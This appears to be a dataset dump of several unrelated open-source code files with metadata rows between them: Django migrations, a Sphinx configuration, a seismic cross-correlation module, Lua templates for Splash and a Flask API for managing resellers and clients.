cursor.execute("ALTER TABLE invoices_invoice DROP invoice_object_type")
transaction.commit_unless_managed()
print "Field invoice_object_type - Dropped"
# rename invoice_object_type_id to object_id
cursor.execute("ALTER TABLE invoices_invoice CHANGE invoice_object_type_id object_id int")
transaction.commit_unless_managed()
print "Renamed invoice_object_type to object_id"
print "done" | gpl-3.0 | 5,166,609,565,698,706,000 | 43.564356 | 114 | 0.560667 | false | 4.672897 | false | false | false |
QuantumGhost/factory_boy | docs/conf.py | 1 | 8502 | # -*- coding: utf-8 -*-
#
# Factory Boy documentation build configuration file, created by
# sphinx-quickstart on Thu Sep 15 23:51:15 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.dirname(os.path.abspath('.')))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.extlinks',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
extlinks = {
'issue': ('https://github.com/FactoryBoy/factory_boy/issues/%s', 'issue #'),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Factory Boy'
copyright = u'2011-2015, Raphaël Barrois, Mark Sandstrom'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
root = os.path.abspath(os.path.dirname(__file__))
def get_version(*module_dir_components):
import re
version_re = re.compile(r"^__version__ = ['\"](.*)['\"]$")
module_root = os.path.join(root, os.pardir, *module_dir_components)
module_init = os.path.join(module_root, '__init__.py')
with open(module_init, 'r') as f:
for line in f:
match = version_re.match(line[:-1])
if match:
return match.groups()[0]
return '0.1.0'
# The full version, including alpha/beta/rc tags.
release = get_version('factory')
# The short X.Y version.
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
if 'READTHEDOCS_VERSION' in os.environ:
# Use the readthedocs version string in preference to our known version.
html_title = u"{} {} documentation".format(
project, os.environ['READTHEDOCS_VERSION'])
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'FactoryBoydoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'FactoryBoy.tex', u'Factory Boy Documentation',
u'Raphaël Barrois, Mark Sandstrom', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'factoryboy', u'Factory Boy Documentation',
[u'Raphaël Barrois, Mark Sandstrom'], 1)
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'http://docs.python.org/': None,
'django': (
'http://docs.djangoproject.com/en/dev/',
'http://docs.djangoproject.com/en/dev/_objects/',
),
'sqlalchemy': (
'http://docs.sqlalchemy.org/en/rel_0_9/',
'http://docs.sqlalchemy.org/en/rel_0_9/objects.inv',
),
}
| mit | -6,028,333,616,958,771,000 | 32.070039 | 80 | 0.693729 | false | 3.635158 | true | false | false |
eqcorrscan/ci.testing | eqcorrscan/utils/correlate.py | 1 | 12024 | """
Correlation functions for multi-channel cross-correlation of seismic data.
:copyright:
EQcorrscan developers.
:license:
GNU Lesser General Public License, Version 3
(https://www.gnu.org/copyleft/lesser.html)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import ctypes
from multiprocessing import Pool
from scipy.fftpack.helper import next_fast_len
from eqcorrscan.utils.libnames import _load_cdll
def scipy_normxcorr(templates, stream, pads):
"""
Compute the normalized cross-correlation of multiple templates with data.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
import bottleneck
from scipy.signal.signaltools import _centered
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
# Currently have to use float64 as bottleneck runs into issues with other
# types: https://github.com/kwgoodman/bottleneck/issues/164
stream = stream.astype(np.float64)
templates = templates.astype(np.float64)
template_length = templates.shape[1]
stream_length = len(stream)
fftshape = next_fast_len(template_length + stream_length - 1)
# Set up normalizers
stream_mean_array = bottleneck.move_mean(
stream, template_length)[template_length - 1:]
stream_std_array = bottleneck.move_std(
stream, template_length)[template_length - 1:]
# Normalize and flip the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
norm_sum = norm.sum(axis=-1, keepdims=True)
stream_fft = np.fft.rfft(stream, fftshape)
template_fft = np.fft.rfft(np.flip(norm, axis=-1), fftshape, axis=-1)
res = np.fft.irfft(template_fft * stream_fft,
fftshape)[:, 0:template_length + stream_length - 1]
res = ((_centered(res, stream_length - template_length + 1)) -
norm_sum * stream_mean_array) / stream_std_array
res[np.isnan(res)] = 0.0
for i in range(len(pads)):
res[i] = np.append(res[i], np.zeros(pads[i]))[pads[i]:]
return res.astype(np.float32), used_chans
def multichannel_xcorr(templates, stream, cores=1, time_domain=False):
"""
Cross-correlate multiple channels either in parallel or not
:type templates: list
:param templates:
A list of templates, where each one should be an obspy.Stream object
containing multiple traces of seismic data and the relevant header
information.
:type stream: obspy.core.stream.Stream
:param stream:
A single Stream object to be correlated with the templates.
:type cores: int
:param cores:
Number of processed to use, if set to None, and dask==False, no
multiprocessing will be done.
:type cores: int
:param cores: Number of cores to loop over
:type time_domain: bool
:param time_domain:
Whether to compute in the time-domain using the compiled openMP
parallel cross-correlation routine.
:returns:
New list of :class:`numpy.ndarray` objects. These will contain
the correlation sums for each template for this day of data.
:rtype: list
:returns:
list of ints as number of channels used for each cross-correlation.
:rtype: list
:returns:
list of list of tuples of station, channel for all cross-correlations.
:rtype: list
.. Note::
Each template must contain the same channels as every other template,
the stream must also contain the same channels (note that if there
are duplicate channels in the template you do not need duplicate
channels in the stream).
"""
no_chans = np.zeros(len(templates))
chans = [[] for _i in range(len(templates))]
# Do some reshaping
stream.sort(['network', 'station', 'location', 'channel'])
t_starts = []
for template in templates:
template.sort(['network', 'station', 'location', 'channel'])
t_starts.append(min([tr.stats.starttime for tr in template]))
seed_ids = [tr.id + '_' + str(i) for i, tr in enumerate(templates[0])]
template_array = {}
stream_array = {}
pad_array = {}
for i, seed_id in enumerate(seed_ids):
t_ar = np.array([template[i].data
for template in templates]).astype(np.float32)
template_array.update({seed_id: t_ar})
stream_array.update(
{seed_id: stream.select(
id=seed_id.split('_')[0])[0].data.astype(np.float32)})
pad_list = [
int(round(template[i].stats.sampling_rate *
(template[i].stats.starttime - t_starts[j])))
for j, template in zip(range(len(templates)), templates)]
pad_array.update({seed_id: pad_list})
if cores is None:
cccsums = np.zeros([len(templates),
len(stream[0]) - len(templates[0][0]) + 1])
for seed_id in seed_ids:
if time_domain:
tr_xcorrs, tr_chans = time_multi_normxcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
else:
tr_xcorrs, tr_chans = fftw_xcorr(
templates=template_array[seed_id],
stream=stream_array[seed_id], pads=pad_array[seed_id])
cccsums = np.sum([cccsums, tr_xcorrs], axis=0)
no_chans += tr_chans.astype(np.int)
for chan, state in zip(chans, tr_chans):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
else:
pool = Pool(processes=cores)
if time_domain:
results = [pool.apply_async(time_multi_normxcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
else:
results = [pool.apply_async(fftw_xcorr, (
template_array[seed_id], stream_array[seed_id],
pad_array[seed_id])) for seed_id in seed_ids]
pool.close()
results = [p.get() for p in results]
xcorrs = [p[0] for p in results]
tr_chans = np.array([p[1] for p in results])
pool.join()
cccsums = np.sum(xcorrs, axis=0)
no_chans = np.sum(tr_chans.astype(np.int), axis=0)
for seed_id, tr_chan in zip(seed_ids, tr_chans):
for chan, state in zip(chans, tr_chan):
if state:
chan.append((seed_id.split('.')[1],
seed_id.split('.')[-1].split('_')[0]))
return cccsums, no_chans, chans
def time_multi_normxcorr(templates, stream, pads):
"""
Compute cross-correlations in the time-domain using C routine.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
used_chans = ~np.isnan(templates).any(axis=1)
utilslib = _load_cdll('libutils')
utilslib.multi_corr.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int, ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS'))]
utilslib.multi_corr.restype = ctypes.c_int
template_len = templates.shape[1]
n_templates = templates.shape[0]
image_len = stream.shape[0]
ccc = np.ascontiguousarray(
np.empty((image_len - template_len + 1) * n_templates), np.float32)
t_array = np.ascontiguousarray(templates.flatten(), np.float32)
utilslib.multi_corr(t_array, template_len, n_templates,
np.ascontiguousarray(stream, np.float32), image_len,
ccc)
ccc[np.isnan(ccc)] = 0.0
ccc = ccc.reshape((n_templates, image_len - template_len + 1))
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
def fftw_xcorr(templates, stream, pads):
"""
Normalised cross-correlation using the fftw library.
Internally this function used double precision numbers, which is definitely
required for seismic data. Cross-correlations are computed as the
inverse fft of the dot product of the ffts of the stream and the reversed,
normalised, templates. The cross-correlation is then normalised using the
running mean and standard deviation (not using the N-1 correction) of the
stream and the sums of the normalised templates.
This python fucntion wraps the C-library written by C. Chamberlain for this
purpose.
:param templates: 2D Array of templates
:type templates: np.ndarray
:param stream: 1D array of continuous data
:type stream: np.ndarray
:param pads: List of ints of pad lengths in the same order as templates
:type pads: list
:return: np.ndarray of cross-correlations
:return: np.ndarray channels used
"""
from future.utils import native_str
utilslib = _load_cdll('libutils')
utilslib.normxcorr_fftw_1d.argtypes = [
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int,
np.ctypeslib.ndpointer(dtype=np.float32, ndim=1,
flags=native_str('C_CONTIGUOUS')),
ctypes.c_int]
utilslib.normxcorr_fftw_1d.restype = ctypes.c_int
# Generate a template mask
used_chans = ~np.isnan(templates).any(axis=1)
template_length = templates.shape[1]
stream_length = len(stream)
n_templates = templates.shape[0]
fftshape = next_fast_len(template_length + stream_length - 1)
# # Normalize and flip the templates
norm = ((templates - templates.mean(axis=-1, keepdims=True)) / (
templates.std(axis=-1, keepdims=True) * template_length))
ccc = np.empty((n_templates, stream_length - template_length + 1),
np.float32)
for i in range(n_templates):
if np.all(np.isnan(norm[i])):
ccc[i] = np.zeros(stream_length - template_length + 1)
else:
ret = utilslib.normxcorr_fftw_1d(
np.ascontiguousarray(norm[i], np.float32), template_length,
np.ascontiguousarray(stream, np.float32), stream_length,
np.ascontiguousarray(ccc[i], np.float32), fftshape)
if ret != 0:
raise MemoryError()
ccc = ccc.reshape((n_templates, stream_length - template_length + 1))
ccc[np.isnan(ccc)] = 0.0
if np.any(np.abs(ccc) > 1.01):
print('Normalisation error in C code')
print(ccc.max())
print(ccc.min())
raise MemoryError()
ccc[ccc > 1.0] = 1.0
ccc[ccc < -1.0] = -1.0
for i in range(len(pads)):
ccc[i] = np.append(ccc[i], np.zeros(pads[i]))[pads[i]:]
return ccc, used_chans
if __name__ == '__main__':
import doctest
doctest.testmod()
| lgpl-3.0 | -4,603,551,828,821,077,000 | 38.683168 | 79 | 0.618596 | false | 3.626055 | false | false | false |
jgirardet/unolog | tests/ordonnances/factory.py | 1 | 1288 | import factory
# from ordonnances.models import Conseil, LigneOrdonnance, Medicament, Ordonnance
from ordonnances.models import Conseil, LigneOrdonnance, Medicament, Ordonnance
from tests.factories import FacBaseActe
fk = factory.Faker
class FacOrdonnance(FacBaseActe):
class Meta:
model = 'ordonnances.Ordonnance'
ordre = ""
# ligne = GenericRelation(LigneOrdonnance, related_query_name='medicament')
class FacLigneOrdonnance(factory.DjangoModelFactory):
ordonnance = factory.SubFactory(FacOrdonnance)
ald = fk('boolean')
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
"""Override the default ``_create`` with our custom call."""
manager = cls._get_manager(model_class)
# The default would use ``manager.create(*args, **kwargs)``
return manager.new_ligne(**kwargs)
class FacMedicament(FacLigneOrdonnance):
class Meta:
model = Medicament
cip = fk('ean13', locale="fr_fr")
nom = fk('last_name', locale="fr_FR")
posologie = fk('text', max_nb_chars=50, locale="fr_FR")
duree = fk('pyint')
class FacConseil(FacLigneOrdonnance):
class Meta:
model = Conseil
texte = fk('text', max_nb_chars=200, locale="fr_FR")
| gpl-3.0 | 2,254,105,173,301,448,400 | 25.285714 | 81 | 0.677795 | false | 3.08134 | false | false | false |
postalXdude/PySplash | py_splash/static.py | 1 | 1346 | LUA_SOURCE = '''
function main(splash)
splash.resource_timeout = splash.args.timeout
{}
local condition = false
while not condition do
splash:wait(splash.args.wait)
condition = splash:evaljs({}{}{})
end
{}
{}
splash:runjs("window.close()")
{}
end
'''
GO = '\tassert(splash:go{}splash.args.url, baseurl=nil, headers={}, http_method="{}", body={}, formdata={}{})' \
.format(*['{}'] * 6)
JS_PIECE = '`{}`, document, null, XPathResult.BOOLEAN_TYPE, null).booleanValue || document.evaluate('
USER_AGENT = '\tsplash:set_user_agent(\'{}\')'
GET_HTML_ONLY = '\tlocal html = splash:html()'
RETURN_HTML_ONLY = '\treturn html'
GET_ALL_DATA = '''
local entries = splash:history()
local last_response = entries[#entries].response
local url = splash:url()
local headers = last_response.headers
local http_status = last_response.status
local cookies = splash:get_cookies()
'''
RETURN_ALL_DATA = '''
return {
url = splash:url(),
headers = last_response.headers,
http_status = last_response.status,
cookies = splash:get_cookies(),
html = splash:html(),
}
'''
PREPARE_COOKIES = '''
splash:init_cookies({}
{}
{})
'''
SET_PROXY = '''
splash:on_request(function(request)
request:set_proxy{}
{}
{}
end)
'''
| mit | 7,171,708,248,713,019,000 | 19.089552 | 112 | 0.595097 | false | 3.220096 | false | false | false |
EdwardDesignWeb/grandeurmoscow | main/migrations/0005_auto_20170824_1135.py | 1 | 3162 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-24 11:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import main.models
class Migration(migrations.Migration):
dependencies = [
('main', '0004_auto_20170823_1229'),
]
operations = [
migrations.CreateModel(
name='Categories',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438')),
],
options={
'verbose_name': '\u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0439',
},
),
migrations.CreateModel(
name='TypesRooms',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u044f')),
],
options={
'verbose_name': '\u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435',
'verbose_name_plural': '\u0421\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0439',
},
),
migrations.AlterModelOptions(
name='photo',
options={'verbose_name': '\u0444\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u044e', 'verbose_name_plural': '\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'},
),
migrations.AlterField(
model_name='photo',
name='image',
field=models.ImageField(upload_to=main.models.get_file_path, verbose_name='\u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438 \u0442\u043e\u0432\u0430\u0440\u0430'),
),
migrations.AddField(
model_name='categories',
name='room',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms'),
),
migrations.AddField(
model_name='items',
name='category',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.Categories', verbose_name='\u041a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044f'),
preserve_default=False,
),
migrations.AddField(
model_name='items',
name='room',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='main.TypesRooms', verbose_name='\u041f\u043e\u043c\u0435\u0449\u0435\u043d\u0438\u0435'),
preserve_default=False,
),
]
| unlicense | -3,458,896,980,396,601,000 | 47.646154 | 225 | 0.622075 | false | 3.058027 | false | false | false |
inova-tecnologias/jenova | src/jenova/resources/reseller.py | 1 | 14834 | from flask_restful import abort, request
from datetime import datetime
import uuid
from jenova.resources.base import BaseResource, abort_if_obj_doesnt_exist
from jenova.models import (
Client, Reseller, Domain, User,
ClientSchema, ResellerSchema, DomainSchema, Service, ResellerServices
)
from jenova.components import Security
from jenova.components import db
class ResellerListResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListResource, self).__init__(filters)
def get(self):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
resellers = Reseller.query\
.offset(offset)\
.limit(limit)\
.all()
if not resellers:
abort(404, message = 'Could not find any reseller')
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}
class ResellerListByQueryResource(BaseResource):
def __init__(self):
filters = ['name']
super(ResellerListByQueryResource, self).__init__(filters)
def get(self, by_name_query):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 100
if offset > limit or limit > 100:
abort(400, message = 'Wrong offset/limit specified. Max limit permited: 100')
total_records = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.count()
if total_records == 0:
abort(404, message = 'Could not find any reseller using query: %s' % by_name_query)
resellers = Reseller.query\
.filter(Reseller.name.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
response_headers = {}
if limit < total_records:
new_offset = limit + 1
new_limit = new_offset + (limit - offset)
response_headers['Location'] = '%s?offset=%s&limit=%s' % (request.base_url, new_offset, new_limit)
return {
'response' : {
'resellers' : ResellerSchema(many=True).dump(resellers).data
}
}, 200, response_headers
class ResellerServicesListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerServicesListResource, self).__init__(filters)
class ResellerDomainListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerDomainListResource, self).__init__(filters)
# def get(self, target_reseller):
# reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
def get(self, target_reseller):
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
count = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.count()
domains = Domain.query\
.filter(Reseller.id == Client.reseller_id)\
.filter(Domain.client_id == Client.id)\
.filter(Reseller.id == reseller.id)\
.offset(offset)\
.limit(limit)\
.all()
if not domains:
abort(404, message='Could not find any domains')
return {
'response' : {
'domains' : DomainSchema(many=True).dump(domains).data,
'total' : count
}
}
class ResellerResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ResellerResource, self).__init__(filters)
def get(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
return {
'response' : {
'resellers' : ResellerSchema().dump(reseller).data
}
}
def delete(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if reseller.clients.all():
abort(409, message = 'The reseller still have clients')
db.session.delete(reseller)
db.session.commit()
return '', 204
def put(self, target_reseller):
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
self.parser.add_argument('email', type=str)
self.parser.add_argument('company', type=unicode)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('enabled', type=bool)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller.email = reqdata.get('email') or reseller.email
reseller.company = reqdata.get('company') or reseller.company
reseller.phone = reqdata.get('phone') or reseller.phone
if reqdata.get('enabled') != None:
reseller.enabled = reqdata.get('enabled')
# Delete all services from the association proxy
del reseller.services[:]
for svc in reqdata.get('services') or []:
service = abort_if_obj_doesnt_exist('name', svc, Service)
reseller.services.append(service)
db.session.commit()
return '', 204
def post(self, target_reseller):
target_reseller = target_reseller.lower()
if Reseller.query.filter_by(name=target_reseller).first():
abort(409, message='The reseller {} already exists'.format(target_reseller))
# TODO: Validate email field
self.parser.add_argument('email', type=str, required=True)
self.parser.add_argument('company', type=unicode, required=True)
self.parser.add_argument('phone', type=str)
self.parser.add_argument('login_name', type=unicode, required=True)
self.parser.add_argument('login', type=str, required=True)
self.parser.add_argument('password', type=str, required=True)
self.parser.add_argument('services', type=str, action='append')
reqdata = self.parser.parse_args(strict=True)
reseller = Reseller(name = target_reseller,
email = reqdata['email'],
company = reqdata['company'],
)
reseller.phone = reqdata.get('phone')
# associate services to reseller
if reqdata.get('services'):
for service_name in set(reqdata['services']):
service = Service.query.filter_by(name = service_name).first()
if not service:
db.session.rollback()
abort(404, message = 'Could not find service: %s' % service)
reseller_service = ResellerServices(
reseller = reseller,
service = service
)
db.session.add(reseller_service)
db.session.flush()
user = User(login = reqdata['login'],
name = reqdata['login_name'],
email = reqdata['email'],
password = Security.hash_password(reqdata['password']),
admin = True
)
reseller.user = user
db.session.add(reseller)
db.session.commit()
reseller = Reseller.query.filter_by(name=target_reseller).first()
return {
'response' : {
'reseller_id' : reseller.id,
'user_id' : user.id
}
}, 201
class ClientListResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientListResource, self).__init__(filters)
@property
def scope(self):
return 'client'
# Overrided
def is_forbidden(self, **kwargs):
""" Check for access rules:
A global admin must not have any restrictions.
Only an admin must access this resource.
A requester must have access of your own clients
"""
target_reseller = kwargs.get('target_reseller')
if self.is_global_admin: return
if not self.is_admin and not request.method == 'GET':
abort(403, message = 'Permission denied! Does not have enough permissions for access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
abort(403, message = 'Permission denied! The reseller does not belongs to the requester.')
def get(self, **kwargs):
target_reseller = kwargs.get('target_reseller')
self.parser.add_argument('limit', type=int, location='args')
self.parser.add_argument('offset', type=int, location='args')
by_name_query = kwargs.get('by_name_query') or ''
reqdata = self.parser.parse_args()
offset, limit = reqdata.get('offset') or 0, reqdata.get('limit') or 25
if self.is_global_admin:
clients = Client.query \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
return {
'response' : {
'reseller_id' : None,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
elif self.is_admin:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
if by_name_query:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.filter(Client.name.like('%' + by_name_query + '%') | Client.company.like('%' + by_name_query + '%'))\
.offset(offset)\
.limit(limit)\
.all()
else:
clients = Client.query.join(Reseller, Client.reseller_id == Reseller.id) \
.filter(Reseller.name == target_reseller) \
.offset(offset)\
.limit(limit)\
.all()
else:
reseller = abort_if_obj_doesnt_exist(self.filter_by, target_reseller, Reseller)
clients = Client.query.filter_by(id = self.request_user_client_id).first()
clients = [clients]
if not clients:
abort(404, message = 'Could not find any clients')
return {
'response' : {
'reseller_id' : reseller.id,
'clients' : ClientSchema(many=True).dump(clients).data
}
}
class ClientResource(BaseResource):
def __init__(self):
filters = ['id', 'name']
super(ClientResource, self).__init__(filters)
@property
def scope(self):
return 'client'
# Overrided
def is_forbidden(self, target_reseller, target_client):
""" Check for access rules:
A global admin must not have any restrictions.
A requester admin must create and delete clients
A requester must have access to your own clients
"""
if self.is_global_admin: return
# Only admin can create and delete clients
if not self.is_admin and not request.method in ['GET', 'PUT']:
abort(403, message = 'Permission denied! Does not have enough permissions for access this resource')
if not target_reseller:
abort(400, message = 'Could not find "target_reseller"')
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
if self.request_user_reseller_id != reseller.id:
abort(403, message = 'Permission denied! The reseller does not belongs to the requester.')
def get(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
client_result = ClientSchema().dump(client)
return {
'response' : {
'client' : client_result.data
}
}
def delete(self, target_reseller, target_client):
reseller = abort_if_obj_doesnt_exist('name', target_reseller, Reseller)
client = abort_if_obj_doesnt_exist(self.filter_by, target_client, Client)
if client.domain.all():
abort(409, message = 'There are still domains associated with this client')
db.session.delete(client)
db.session.commit()
return '', 204
